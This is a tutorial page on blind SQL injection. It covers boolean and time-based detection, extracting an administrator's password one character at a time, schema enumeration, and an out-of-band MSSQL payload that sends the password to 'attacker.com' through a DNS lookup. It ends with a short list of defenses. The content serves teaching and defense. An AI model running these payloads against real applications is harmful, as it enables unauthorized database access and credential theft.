Skip to content
Ultimate Degree

Blind SQL Injection

Blind SQL injection is a type of SQL injection attack that occurs when an application is vulnerable to SQL injection, but the attacker cannot see:

  • The results of their injected queries
  • Database error messages
  • Any direct SQL output

Think of it like trying to guess the content of a locked box by asking only yes/no questions - you can’t see inside, but you can learn about its content through careful questioning.

Why is it “Blind”?

Unlike regular SQL injection where attackers can see query results directly:

  • No data is displayed in the response
  • No error messages reveal database information
  • Attackers must rely on indirect indicators

How to Detect Blind SQL Injection

1. Boolean-Based Detection

Testing if the application behaves differently based on TRUE/FALSE condition.

Original Request

Cookie: TrackingId=original_value

Test Cases

-- True Condition
TrackingId=original_value' AND 1=1--
-- False Condition
TrackingId=original_value' AND 1=2--
Result: Different application behavior

When the condition is true (1 = 1), the application behaves normally. When the condition is false (1 = 2), the application may behave differently.

2. Response Indicators

Look for differences in:

  • Success messages
  • Error messages
  • HTTP status codes
  • Page content
  • Response timing

Exploitation Techniques

1. Boolean-Based Data Extraction

Extract data one character at a time by asking TRUE/FALSE questions.

Example Scenario

  • Goal: Extract administrator’s password
  • Table Structure: Users(Username, Password)

Step-by-Step Process

  1. First Character Position
-- Is first character greater than 'm'?
xyz' AND SUBSTRING((SELECT Password FROM Users
    WHERE Username='Administrator'), 1, 1) > 'm'--


-- Is first character equal to 's'?
xyz' AND SUBSTRING((SELECT Password FROM Users
    WHERE Username='Administrator'), 1, 1) = 's'--
  1. Subsequent Characters
-- Second character
xyz' AND SUBSTRING((SELECT Password FROM Users
    WHERE Username='Administrator'), 2, 1) = 'e'--


-- Continue for each position

Optimization Tips

  • Use binary search for character guessing
  • Start with common characters
  • Test multiple positions in parallel
  • Consider case sensitive

2. Time-Based Extraction

When boolean responses aren’t reliable, we can use time delays to extract information.

-- If condition is true, delay response
xyz' AND IF(SUBSTRING(password,1,1)='a',SLEEP(5),0)--
-- Example using MSSQL
'; IF (SELECT COUNT(*) FROM Users WHERE Username='Administrator'
    AND SUBSTRING(Password, 1, 1) = 'a') = 1
    WAITFOR DELAY '0:0:5'--


-- If first character is 'a', response will be delayed by 5 seconds

Advanced Techniques

1. Database Schema Enumeration

Before extracting data, we often need to understand the database structure. This is like creating a map of the database.

-- Check if table exists
xyz' AND (SELECT COUNT(*) FROM information_schema.tables
    WHERE table_name='Users')=1--
-- Check if column exists
xyz' AND (SELECT COUNT(*) FROM information_schema.columns
    WHERE table_name='Users' AND column_name='Password')=1--

2. Data Type Detection

Sometimes, we need to know the data type of a column to extract data correctly.

-- Test if column is numeric
xyz' AND (SELECT CASE WHEN (1=1) THEN 1
    ELSE 1*(SELECT password FROM Users) END)=1--

3. Out-of-Band Data Extraction

Sometimes, we need to force the database to communicate with us through external channels.

-- DNS-based extraction (MSSQL)
'; DECLARE @p varchar(1024);
SET @p=(SELECT TOP 1 Password FROM Users);
exec('master..xp_dirtree "//'+@p+'.attacker.com/a"')--


-- This causes the database to send the password via DNS lookup

Defense Strategies

  • Use parameterized queries
  • Input validation with whitelisting
  • Stored procedures with proper implementation
  • ORM frameworks with security features